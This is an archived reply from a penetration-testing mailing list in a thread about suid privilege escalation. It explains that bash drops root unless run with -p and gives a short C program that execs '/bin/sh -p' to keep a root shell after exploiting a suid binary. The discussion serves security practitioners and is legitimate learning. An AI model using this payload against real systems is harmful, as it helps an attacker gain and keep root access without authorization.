Penetration Testing mailing list archives
Re: question on escalating privileges via suid vulnerabilities
From: Christoph Bussenius <pepe-bugtraq () pepe is-a-geek org>
Date: Mon, 26 Feb 2007 13:51:04 +0100
Hi John, On Sat, Feb 24, 2007 at 11:52:49AM -0700, John McGuire wrote:
When I run the app as a non-root user, I get a /bin/sh prompt with that users perms, not roots. I modified this program a bit to take an argument off the command line and passed it `whoami`. This returned root as the response. /bin/sh however belongs to the lower priv user.
Bash resets its effective uid to the real uid unless you give it the -p switch. This will work: #include <stdio.h> int main() { char *arr[3]; arr[0] = "/bin/sh"; arr[1] = "-p"; arr[2] = NULL; execve (arr[0], arr, NULL); } Regards, Christoph ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- question on escalating privileges via suid vulnerabilities John McGuire (Feb 25)
- Message not available
- Re: question on escalating privileges via suid vulnerabilities John McGuire (Feb 26)
- Message not available
- Re: question on escalating privileges via suid vulnerabilities Christoph Bussenius (Feb 26)
- Re: question on escalating privileges via suid vulnerabilities Marco Ivaldi (Feb 26)
- Re: question on escalating privileges via suid vulnerabilities Andrea Purificato - bunker (Feb 26)
- Re: question on escalating privileges via suid vulnerabilities Fábio Russo (Feb 28)